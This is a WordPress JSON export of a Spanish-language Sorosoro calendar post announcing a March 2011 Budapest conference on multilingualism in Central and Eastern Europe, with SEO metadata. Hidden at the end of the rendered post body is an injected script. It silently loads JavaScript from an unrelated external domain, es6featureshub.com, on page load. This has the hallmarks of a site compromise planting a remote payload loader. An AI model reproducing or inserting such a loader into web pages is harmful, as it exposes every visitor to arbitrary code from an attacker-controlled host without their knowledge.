{"id":44051,"date":"2011-03-25T23:30:53","date_gmt":"2011-03-25T22:30:53","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=44051"},"modified":"2025-10-21T23:06:01","modified_gmt":"2025-10-21T21:06:01","slug":"25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/","title":{"rendered":"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda"},"content":{"rendered":"<p style=\"text-align: justify;\">El <strong><a href=\"http:\/\/www.nytud.hu\/eng\/index.html\" target=\"_blank\">Centro de Investigaci\u00f3n sobre el multiling\u00fcismo<\/a> de la Academia de las Ciencias de Hungr\u00eda<\/strong>, con la colaboraci\u00f3n de la <strong>red de centros Mercator para la diversidad ling\u00fc\u00edstica <\/strong>y la <strong>Comisi\u00f3n Europea<\/strong>, organizan una primera conferencia internacional con el tema: \u00ab El multiling\u00fcismo en Europa, perspectivas y pr\u00e1cticas en Europa Central y del Este \u00bb.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Los organizadores de la conferencia constatan que la <strong>accesi\u00f3n de los Estados de Europa Central y del Este a la Uni\u00f3n europea <\/strong>ha creado nuevos problemas que conciernen a la diversidad ling\u00fc\u00edstica. La pregunta se plantea de hecho acerca del lugar de las lenguas llamadas \u00ab minoritarias \u00bb, ya sean regionales o de inmigraci\u00f3n, en este nuevo contexto. Ya que si esos pa\u00edses han conocido cambios dr\u00e1sticos desde la ca\u00edda del comunismo en los terrenos de la econom\u00eda o de la educaci\u00f3n, las pol\u00edticas ling\u00fc\u00edsticas son a\u00fan grandes temas de controversias.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Consideran as\u00ed que hace falta actualmente <strong>repensar la perspectiva de la diversidad ling\u00fc\u00edstica en Europa <\/strong>y pretenden, a trav\u00e9s de esta conferencia, reunir a investigadores, profesores de lenguas y responsables pol\u00edticos para evaluar las nuevas necesidades ligadas a la protecci\u00f3n de las lenguas menos difundidas, el papel de la lengua materna y el desarrollo del multiling\u00fcismo en los niveles regionales y locales.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Estas preguntas ser\u00e1n abordadas durante dos d\u00edas de conferencias y mesas redondas a trav\u00e9s de ocho temas que van de la educaci\u00f3n biling\u00fce a la cuesti\u00f3n de las lenguas de los pueblos gitanos, pasando por las pol\u00edticas europeas en materia de multiling\u00fcismo.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Para <a href=\"http:\/\/www.nytud.hu\/mconf\/\" target=\"_blank\">el programa completo<\/a><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><em>Viernes 25 y s\u00e1bado 26 de marzo<\/em><\/p>\n<p style=\"text-align: justify;\"><em><a href=\"http:\/\/www.hotelbenczur.hu\/en\" target=\"_blank\">Hotel Bencz\u00far<\/a><br \/>\n<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Budapest<\/em><\/p>\n<p><em>Hungr\u00eda<\/em><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El Centro de Investigaci\u00f3n sobre el multiling\u00fcismo de la Academia de las Ciencias de Hungr\u00eda, con la colaboraci\u00f3n de la red de centros Mercator para la diversidad ling\u00fc\u00edstica y la Comisi\u00f3n Europea, organizan una primera conferencia internacional con el tema: \u00ab El multiling\u00fcismo en Europa, perspectivas y pr\u00e1cticas en Europa Central y del Este \u00bb. [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-44051","post","type-post","status-publish","format-standard","hentry","category-calendario"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"El Centro de Investigaci\u00f3n sobre el multiling\u00fcismo de la Academia de las Ciencias de Hungr\u00eda, con la colaboraci\u00f3n de la red de centros Mercator para la diversidad ling\u00fc\u00edstica y la Comisi\u00f3n Europea, organizan una primera conferencia internacional con el tema: \u00ab El multiling\u00fcismo en Europa, perspectivas y pr\u00e1cticas en Europa Central y del Este \u00bb. [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-03-25T22:30:53+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T21:06:01+00:00\" \/>\n<meta name=\"author\" content=\"Rozenn Milin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Rozenn Milin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/\"},\"author\":{\"name\":\"Rozenn Milin\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/dd9df1e0efca59879d3133588ff0dfc1\"},\"headline\":\"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda\",\"datePublished\":\"2011-03-25T22:30:53+00:00\",\"dateModified\":\"2025-10-21T21:06:01+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/\"},\"wordCount\":318,\"articleSection\":[\"Calendario\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/\",\"name\":\"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"datePublished\":\"2011-03-25T22:30:53+00:00\",\"dateModified\":\"2025-10-21T21:06:01+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/dd9df1e0efca59879d3133588ff0dfc1\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/dd9df1e0efca59879d3133588ff0dfc1\",\"name\":\"Rozenn Milin\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/rozenn-milin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/","og_locale":"es_ES","og_type":"article","og_title":"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda - Sorosoro","og_description":"El Centro de Investigaci\u00f3n sobre el multiling\u00fcismo de la Academia de las Ciencias de Hungr\u00eda, con la colaboraci\u00f3n de la red de centros Mercator para la diversidad ling\u00fc\u00edstica y la Comisi\u00f3n Europea, organizan una primera conferencia internacional con el tema: \u00ab El multiling\u00fcismo en Europa, perspectivas y pr\u00e1cticas en Europa Central y del Este \u00bb. [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/","og_site_name":"Sorosoro","article_published_time":"2011-03-25T22:30:53+00:00","article_modified_time":"2025-10-21T21:06:01+00:00","author":"Rozenn Milin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Rozenn Milin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/"},"author":{"name":"Rozenn Milin","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/dd9df1e0efca59879d3133588ff0dfc1"},"headline":"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda","datePublished":"2011-03-25T22:30:53+00:00","dateModified":"2025-10-21T21:06:01+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/"},"wordCount":318,"articleSection":["Calendario"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/","name":"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"datePublished":"2011-03-25T22:30:53+00:00","dateModified":"2025-10-21T21:06:01+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/dd9df1e0efca59879d3133588ff0dfc1"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/03\/25-26-de-marzo-conferencia-sobre-las-perspectivas-y-las-practicas-del-multilinguismo-en-europa-central-y-del-este-budapest-hungria\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"25-26 de marzo: conferencia sobre las perspectivas y las pr\u00e1cticas del multiling\u00fcismo en Europa Central y del Este, Budapest, Hungr\u00eda"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/dd9df1e0efca59879d3133588ff0dfc1","name":"Rozenn Milin","url":"https:\/\/www.sorosoro.org\/es\/author\/rozenn-milin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/44051","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=44051"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/44051\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=44051"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=44051"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=44051"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}